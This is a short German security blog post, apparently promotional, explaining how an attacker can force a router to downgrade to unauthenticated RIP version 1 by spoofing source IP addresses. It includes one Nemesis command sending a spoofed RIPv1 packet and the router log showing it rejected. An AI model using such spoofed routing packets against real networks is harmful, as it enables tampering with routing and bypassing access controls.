Herabstufung des RIP-Protokolls.
Oleg Petukhov, Rechtsanwalt im Bereich des Völkerrechts und des Schutzes personenbezogener Daten, Spezialist für Informationstechnik sicherheit, Schutz von Informationen und persönlichen Daten.
Telegramm-Kanal: https://t.me/datenschutzmit
Die Gruppe im Telegramm: https://t.me/datenschutzmit1
Website: https://legascom.ru
E-Mail: online@legascom.ru
#informationssicherheit #informationssicherheit
Bei Verwendung von RIP Version 1 wird keine Authentifizierung verwendet und der Schutz erfolgt nur über Zugriffslisten. Sie können Zugriffslisten umgehen, indem Sie die IP-Adresse der Quelle fälschen. Als nächstes muss der Angreifer den Router zwingen, RIP Version 1 zu verwenden. Sie können dies mit einem Paketgenerator wie Nemesis tun:
root@kali : # nemesis rip -v -c 1 -V 1 -S 192.168.66.102 -D 192.168.66.202
c2611# 340408: 8w6d: RIP: ignored v1 packet from 192.168.66.102 (illegal version)
Es ist erwähnenswert, dass diese Methode auf modernen Cisco-Routern mit dem IOS-Betriebssystem nicht funktioniert.




